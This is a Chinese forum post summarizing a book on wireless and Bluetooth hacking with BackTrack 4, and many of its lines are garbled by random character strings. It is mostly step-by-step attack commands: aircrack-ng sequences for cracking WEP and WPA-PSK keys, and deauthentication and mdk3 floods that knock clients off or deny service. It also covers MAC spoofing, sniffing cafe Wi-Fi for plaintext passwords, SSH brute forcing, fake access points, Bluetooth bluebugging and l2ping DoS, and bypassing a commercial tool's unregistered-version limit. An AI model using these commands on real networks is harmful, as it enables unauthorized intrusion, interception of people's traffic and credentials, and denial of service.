少校

- 注册时间
- 2008-11-14
- 金币
- 2277 个
- 威望
- 7 个
- 荣誉
- 6 个
累计签到:14 天 连续签到:0 天 [LV.20]漫游旅程
|
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。: X, y3 D& G! i& h5 L: a( t9 U
) w6 z* g6 m3 \% X W% C
以下所有操作均在BackTrack 4中进行。0 F i. h3 G) c1 s( V0 O; B
" t4 g6 R7 H. E" K! l) w5 h8 N/ j, h0 V/ G2 \0 M& u+ r0 |
无线WEP加密P解:: F( p7 v4 u* Z3 d& O# \; Q. V
) s s1 ^* N2 |; K- k1 c
注入P解:
# p* \" K% k5 A# M9 L3 Q3 T& Z3 l3 V; F+ H* }5 c
ifconfig! b3 l+ L8 q% ~9 o
& L# H3 y' E* {
ifconfig –a
1 G5 i7 ]3 K7 |6 X0 @# y% v! P. G7 o0 }
ifconfig wlan0(无线网卡) up) ?& S: a9 p: u. r$ S% n
7 e4 v' B1 t4 r% ~2 R8 ?* z+ Sairmon-ng start wlan0
! x6 }4 k1 U/ `" {% N' C# L& X
! x1 @& b) }' z: x* aairodump-ng mon0; V1 ?4 T: `7 m5 j
7 _" S/ S& _( u
airodump-ng --ivs –w ivsfile –c 频道 mon0或
& z! c0 c& C, ?3 ]- L5 n1 [1 A) F- i6 B6 z7 e
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon08 ^1 z! t! d( f4 l- Q5 q
4 [: T8 q3 V; X+ j
aireplay-ng -3 –b BSSID –h Station mon0* ~6 m* D5 H8 }2 \ k
% b! t0 y; ~8 c" M L
aircrack-ng ivsfile-01.ivs
3 k: f' u3 D) J9 p
! C, m0 N: _5 [; z9 x, A虚连接P解(适用于无客户端连接APP解)3 ^% @) ~( p M6 w0 L t6 A
- u2 {- f/ r* I* ?3 G1 M
ifconfig, L: }6 i4 d: W! z
/ b( l. H' H1 G' Z
ifconfig –a
' m& R7 p' j3 I3 x ]0 D# H
4 G* \/ Z# z0 e4 D- Cifconfig wlan0(无线网卡) up/ C6 i, ^: k+ e
. K- `. M" L+ z0 n u: J! P9 Fairmon-ng start wlan0
4 Y! R; S0 A7 A8 c0 D% o" B D b
6 T9 L: R9 c0 I, d Fairodump-ng mon0, |2 Q( M/ U" ^8 S0 S' i6 @* R
* f* J! @; G5 A/ X; s1 fairodump-ng --ivs –w ivsfile –c 频道 mon0或
+ y) }! @9 F c, F) w4 K0 w4 b) i1 D! p$ Q) P
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0" u& E7 q2 K# a! { ?9 V" q
, R# i o h+ R4 E0 maireplay-ng -1 0 –e SSID –a BSSID –c Station mon0) b- w2 |( a y( j* d
: b- I. I: L+ o$ f/ D. i% |aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
6 k2 j- ]. h" T$ i2 L+ u7 ]6 W) s* ]
aircrack-ng ivsfile-01.ivs' P* H$ v' A& [# S S2 v, O
- y2 e, N0 }; M* j3 d: Y& \; m7 ?3 Y+ D: V5 y
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
9 F% T8 N" p P4 I- X- |* Z/ f: Y, X [: l' d
8 I2 U0 ^$ X" S; M9 }4 pWPA-PSKP解
H( Y. r/ B9 L3 Z5 ?) V2 D! i
1 E# l7 T4 X- l- Z0 s$ ~ifconfig
% i- w+ g' C; c2 Q
) A4 J* B1 i( w9 Z' p5 Lifconfig –a
: v& z: j+ i' R9 G- L7 Z& j) H8 s0 A" k0 `+ y5 \( K# m# [* Q
ifconfig wlan0(无线网卡) up3 s8 T% }- I- X5 i% G& \
' K! j8 a' e2 T7 \$ Tairmon-ng start wlan0
7 F* d+ g' U0 {# j& ~( ?
7 q7 r+ [/ m7 j% Cairodump-ng mon09 V. r+ `8 @4 f5 s2 r" Y# S
& {# P4 P* m/ {- c. L3 Z" gairodump-ng –w capfile –c 频道 mon0+ V- I$ N0 B8 m/ o/ ^9 n2 @9 M; h
9 R! Q8 A0 R0 [& [0 A$ `9 b
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
: o0 `* [$ ]/ o) w7 u* ?" z5 a( v7 b/ T( X0 B
aircrack-ng –w Dic capfile-01.cap或2 l" l& G% p5 n$ c) O* H
7 `9 X- t/ ^4 [* K( ^8 M* O" Z1 I& o
cowpatty –f Dic –r capfile-01.cap –s SSID
1 k3 Z/ y6 A/ O7 P& H/ L$ m& O/ d* T+ J2 G6 P( I
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID3 T' ]# ?& `" F' s8 F# u% U
1 R3 a+ _( z' h( p
傻瓜式P解软件SpoonWPA。' i4 e. }3 f. t4 e
1 c1 ? H/ n; m" d0 h" SBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst0 D U$ d$ g6 I6 t
7 }/ C' {5 L5 \1 i( Z3 a+ q0 v% A5 Q
( h4 Q- N X' _: R3 C" V8 _字典文件的生成和上传 C! R9 N& _2 B3 R
' P' P$ |* }- Z9 ?3 N' V在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。% o& l' U5 s: w, V
4 H# L+ W, A. G/ o X
. ~# `- D) {5 @! M1 u/ E$ [! ]# \% |BT4下开启Tftp:Services—TFTPD—start TFTPD
5 D2 l* \6 @, R8 c5 J2 t7 ] K: h" \( X2 \3 F$ z% I
在Windows的CMD中运行 tftp –i IP put **.dic" D) L9 ?8 R7 }( `
( ~- l5 j K; I4 P( N* L% a
; b# J$ A, S/ [ t- m6 d7 T$ x2 nBT4下开启SSH:Services—SSH—start SSH
/ ]' A8 c$ J, W5 [0 B& l) i9 O
7 W) [# k6 I% N. wWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root9 }3 E4 w5 N* o4 ~ V
8 X9 C! k' q6 ]" s% Z, i8 b+ Z `9 t! u7 m8 P7 N1 O
AP限制MAC时的解决
8 Z$ F/ a7 O! n1 E& E% m6 c- M3 T* f: q: R3 Z3 g% A" L E
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:3 @8 G# D( {3 ~. `
9 N, t m, s/ K3 U# v0 U5 H
ifconfig wlan0 hw ether NewMAC
. u8 F8 F! H w
1 l1 n$ @3 o% @6 X. M s
" J9 W: X' G1 x关闭SSID广播的AP探测:" L! ]9 Z0 t0 J% a+ n4 C
+ |$ J3 Y3 D( Q( x C: x* ?1. Deauth攻击:
' O O1 }% i3 |1 ~ l% Z, K3 }/ l
. [' x# V) Q, d- F' w! |. Tairodump-ng mon0
! M% H& P- _; T) w* O; b2 J, f
' w9 v9 S4 I9 F- L2 h: t6 n, \5 ^4 daireplay-ng -0 10 –a BSSID –h Station mon0: W7 T) F. }4 x t% [; j" c
' @: D) k \5 t+ x7 k" j$ p$ M2. 抓包分析; W( K+ i( N6 ~3 F$ c) X
" q9 W! X( O' ]' ~8 H
Omnipeek
4 I9 R, [$ o7 \1 j" S
9 K3 ^" ?, i2 Y: z2 ]5 N; }' ITcpdump –n –e –vvv –i 网卡名
. n- F. \: r" P( T- ^& U2 {
# \3 @4 L7 }# C" r- |6 M3. 暴力P解7 k: L; ~! g2 q. \
+ @# p' j- ~/ B" p5 \" B/ q% F1 ]& xCharon 1.1暴力P解2 ]2 D( s* a) X. J( b( A' [6 n
1 \$ v \2 `% Z! f4 y: X" L
5 H: N: P4 \8 R0 b无线加密数据包的解密8 v! }$ i0 a7 k& W1 p2 G+ q# n G
N# a7 k$ ?! [6 y
7 q* w( A# v( S" m# s Y2 L( |使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
7 Y( S( G9 B. E8 X p2 H# ~1 A; l0 w; y1 s: \, G/ O; g
Filter NS DNS解析数据包( q# f4 ]) T2 y7 f* a* M
) M4 C. f' G W& m9 T4 NFilter:HTTP WEB访问数据包
8 ]& k/ y. M% }: g" m7 }# H8 o0 a+ }+ B" g- ^
Filter:msnms MSN
/ Z0 G7 E( e- Q4 [: i# B
8 F0 O7 I0 @! UCtrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。8 Q0 r W2 A# @! j! ~
( ]+ T! v E+ d- U使用airdecap-ng解密:
( i- ]8 f3 C! H7 K) j. M
4 R: H5 Q# k. H3 r) YAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap
6 V- D: _/ L7 S% K* u3 V8 y0 s" O0 U& l% B: S2 q
) ^6 N- F+ x4 S7 O5 |7 |
咖啡馆中无线数据截取(开放式无加密AP)
6 f# C/ ]2 M1 Y/ Z+ u+ D1 W* F$ y
5 ~" H) C2 J$ C! \* B/ M- b1.Airodump-ng –w data –c频道 mon0
: ^! W, ] a8 N, M4 H; g1 M- m% M6 h" H. t; n
2.使用WireShark打开分析
; H! K# s9 S t0 l( Z& J: l/ ~# F- Q0 K2 _
- _( S5 R) b7 H# |
BT4下的渗透工具:
. d" r- @. X( Y1 H& C* Y; I9 l( @5 e* T4 k( R% V
nmap –sP IP/24 判断C段下存活的主机
4 C+ U- r( R' x- F
% G4 Y ^4 y F( snmap –vv –sS IP/24 –p Port 扫描指定端口是否开放0 E+ f/ C8 f: h( ~" V
! Q* h E$ J6 Q) g8 K6 E/ z2 f* mnmap –vv –sV IP –p port 指定端口的详细信息。。。
; Q/ z g' j+ X8 _. O% d
9 H1 C; e3 p9 u8 \namp –O IP/24 判断主机的系统版本6 o) W; m$ z6 F" b4 d3 \( C
) a% y4 `' |( O0 C1 x/ g
9 h% ^9 S- C$ }! ~5 F4 OGUI 版nmap:Zenmap - o9 t$ O' ]. _
X8 x$ c5 q7 @/ @
H0 E( I4 E9 H6 N* ^
Amap使用:amap –B IP port8 y& X# v. j/ ^4 b
- H# i$ m# s+ q# G- aNbtscan(扫描Windows网络NetBios信息):
8 E4 B$ d1 d9 V0 ^+ Q, d1 ~& G, Z; ?4 E1 |5 m1 {
nbtscan –v –s : IP/24
: ^* M5 G7 ~" Y1 ]
+ O' s7 E( \& U& f; C- G. j% anbtscan –r IP
9 s2 f$ N7 f- V9 O% d; ]' `" _+ a
1 f% ~! u5 d5 F5 s+ c5 v! G! q
4 R% k+ ]8 s" q/ {3 l, X, PDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
0 {% t/ z# I" \& r% n" t) P' j- G7 c# L% x; f' E6 R
/ g7 o4 V( v1 p nHydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
2 M. w, f4 f7 }5 Z& o0 }
3 O& Q7 l9 p( p) ]+ LBruteSSH: ./bruthe.py –h IP –u Username –d Dic
3 T0 v0 n& i# \9 l: l9 q7 `* Q Y; K5 f' r# u, L" |$ S
Metasploit3使用+ s) d5 h- ~- u2 {
无线D.0.S
' |' n! q: L$ \) Z
8 q2 X( c# }4 Z: j: z! |) B7 X! Y/ N. ^1 H* Y8 F% _5 g; d
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
( }; U# u1 @; E8 v# H( }: h9 S, W$ t, |! r9 t) B9 c
airmon-ng start wlan0- _. _3 a# L: J s6 d. L, D! ^
4 M& u. Y# B; l$ G2 v P, Oairodump-ng mon0
7 x1 m8 W$ O" C2 B! x: k+ p, D1 h# J, {5 G7 Y6 e
mdk3 mon0 a –a BSSID
8 g7 l5 R0 @) _' A- z; o0 y
- U7 I* A/ Q. b# K8 ]% l4 |2 ^对所有的AP攻击:mdk3 mon0 a9 ?7 _& D# o$ _$ n% t
, b, d7 H! M7 p9 W! ]' y& r$ f6 o M+ z
Deauth Flood 攻击
' `* h! y0 u- u) ]# e8 n2 y2 h+ B' V/ U' O3 {( ?, d( a" R7 c- M: m$ R1 P
mdk3 mon0 d –c Channel
9 C ~, N0 T5 V) M4 _3 K( L \% @2 w, S3 g/ j3 M7 K
图形化D.O.S攻击:Charon, h+ ^" }5 i0 z; b3 P4 f
+ x2 x' T; M: ~1 z- n5 r
0 U/ B' d5 p8 N当受到攻击时,使用Wireshark抓包可以看到异常信息。
! Z0 o7 Y) y" z; p1 V6 y4 _9 V
5 F8 }4 M4 ^/ C% }/ k- @3 \' t0 _* z: l' j9 @) o# f; i# `
WPA-PSK高速P解
) @2 Z5 c" I$ k9 P8 E' w
9 R! r( ]/ |: ?3 |* j2 l$ k3 Z1. WPA-PSK PMK Hash TablesP解
s4 i6 U9 x6 x
2 v6 |' T3 _) h/ UCowpatty –d HashTable.hash –r ***.cap –s SSID
# Z! ^/ H* c" t1 E. u5 R, _! r. ~/ S1 M8 O9 p4 ~) {
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
6 p A7 z9 ]' _* v
; g4 Y0 c6 {9 F8 z( j7 N$ D; Z2. GPU辅助高速P解
: f6 j( j/ ~7 n3 q4 [2 g' z+ ^
, B: H% `% ~- p1 [使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
! i6 J/ b8 Q5 j1 l; ] m* v' {+ Q6 ]7 Z
3. 分布式P解- d: R+ `- M+ n& h# {, M! z
3 \, ^) [/ q* f2 M
/ a: U) ~. s+ B# n4 ^- z+ nAP的伪造0 G# S- N! w$ U+ `% b6 r; i. x
7 K6 W3 }$ s! o$ u
把AP的MAC改成目标AP的MAC8 O* h+ x9 s" {8 r; n5 D- _
& k% T+ s3 t" c5 o
网卡软AP
0 `! t" ]. @3 z5 q
* C) W6 d1 Y% w) O6 T3 P1 ^$ Z7 x$ ^8 U$ J3 F. ?8 h( \
伪造大量虚假AP信号:
( t E9 h b. A- I
5 S d1 l. ]; p随机SSID:mdk3 mon0 b –g –c 频道 5 r0 t. B" N( I$ o0 v2 _
, \/ T' Y0 Y5 v0 g6 E
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度0 t6 u6 V- s! d0 ~% F
9 O* d) F; `' O/ I! ?- C& _
) I) ^* Q9 _! J1 tWar-Driving
' X! b$ f. J9 ^4 J1 L3 u8 l: `9 s& w8 n9 W0 u
热点地图绘制
: H+ s+ N$ O+ Q, V4 ]+ {3 W0 u9 o
0 b4 H7 ]: p0 ~1 k9 t- _2 XWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
* G# \; J8 J# p6 O/ ?# c! [; c& n
1 Z- r/ Z$ W) v! Q) Y; i4 |
Netstumble6 \# y. H0 u9 D) u+ H
( m* {/ @% y/ k" I# h7 P
( a9 k& `2 A' b( D. ?8 E蓝牙Hacking. k3 h( B, _1 ]- Z; T1 T c) g( C
4 p7 c& H8 a; }$ N& G% @. GWindows下的Blue Soleil工具) a9 d9 u, k% X5 L
" `2 p: r ~: o. |2 |' G9 s7 V6 n
BT4:
3 J3 G5 t! v z) W8 j6 `: y& d2 M. v9 m2 x- {5 [/ S0 n A7 H
hciconfig 查看蓝牙适配器
* {5 \7 v% K, T. x/ ], ]# j2 C5 I) N7 U7 o! M* `; r/ J5 E; ?
hciconfig hci0 up 载入蓝牙适配器
9 p. r8 \) g0 M; t& ]5 G7 p+ A$ K# U9 g" ]5 r$ B3 ?
hciconfig hci0 class 蓝牙适配器详细信息) [1 ^2 G" e/ |; _
. T& e! `+ f' p) p S3 r
3 v. x1 E8 c6 u
hcitool(扫描蓝牙)
1 H- |! q) N2 G1 U- Y# c1 @5 f" m- P- g! P$ \
hcitool –i hci0 scan/ N- p9 b0 Q( P% m: a5 R* k$ F# p
+ X+ J# }% q* |- f8 OBTscanner(扫描蓝牙)
: n9 w$ e5 J6 {/ X2 }4 P+ W
: ~+ g+ H6 l$ G0 @- ~1 f: M8 P& G4 z$ f$ }/ Y* j
蓝牙攻击:) W4 L7 ?, Y/ L$ R7 x' I, g" b
, t/ ^4 Q# ?% YBlueBugging (适用于BlueTooth V1.1的手机)
4 m M0 u( z) C0 g( e
- G( C2 V2 Q( S0 kBluebugger工具:& _7 o% F( G, j/ h! K
7 j6 J0 V( q' LBulebugger –a HD_Addr info' E3 k9 ~9 K; ?: L: y6 d7 i- F8 J' Y4 m( S
( [% @% S0 O" f3 i
1 a# ~, g1 b0 e8 w8 Q& u+ F
BlueJacking
- R! p3 E6 t# Z9 `* T3 N
# z b' `9 \8 A) H1 d; G. ]: i1 B实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。& S3 v9 S' f( u; {3 c3 I
8 S3 s, _& W4 f- g* u
; h! a* {1 v9 [) w" LHD_Addr修改:
" K3 [5 ^* `( W. r' E: F
4 P4 Q) @2 B0 p, o8 sBdaddr工具
' k! _2 W$ Y. F) U7 }9 T
`/ b3 X4 K8 m! v) Y9 b2 Q8 u, Ebdaddr –i 蓝牙设备名 新HD_addr/ g, w+ M' A( U- `0 I
5 j5 Q' [! Z# D I! \$ }
( P, z5 R: I' {/ `4 G: {" S蓝牙D.O.S/ w7 s+ b- l- V# g
/ ~% q3 J$ o1 b( Il2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务& A; W$ b/ r2 k3 |) h
" F+ k: s8 [2 |3 ?5 D$ w1 z
hciconfig
# M4 N. X! A% L( C2 O: i5 Q" B6 X& g2 i3 y! T. `' K
hciconfig hci0 up
. a7 X0 f$ ?$ I6 L! r9 q) k5 L1 P0 q1 ]% C& b; o
hcitool –i hci0 scan# k9 k8 _* P& I. x3 U2 [3 I; [) D
: \3 u; T6 \0 J1 e3 ~; z
l2ping –s 10000 –目标MAC
J& Q$ N- I) B9 U5 O0 f+ w! i; s* G$ e# R3 Q
p5 `6 `( q2 Y4 f$ Y! `
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
: Z& Z! E: a0 c/ A6 s" S$ r* H; ?
./fang –r ************-############ -s
- b, l- R A+ W6 h7 M0 o
2 ~# S! F( x' T' Y& z/ L, B, I暴力P解************-############的蓝牙设备
0 T) g7 v& |8 `9 R+ n$ s' k8 m
+ a- L5 i# O3 b./fang –l 各厂商BD_Addr分配- z: ?! f, P9 O/ J+ V
' H' r' D% v( D; ~4 _) R
2 ?& t0 b B: |6 B$ y
WifiZoo使用* e( o. X, O8 @" |
; f* y# j, U7 D4 c* r# E./wifizoo.py –c Capfile9 O% P8 e+ V3 g7 W
5 z8 o" X; ]" t9 g
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情 |
评分
-
2
查看全部评分
-
|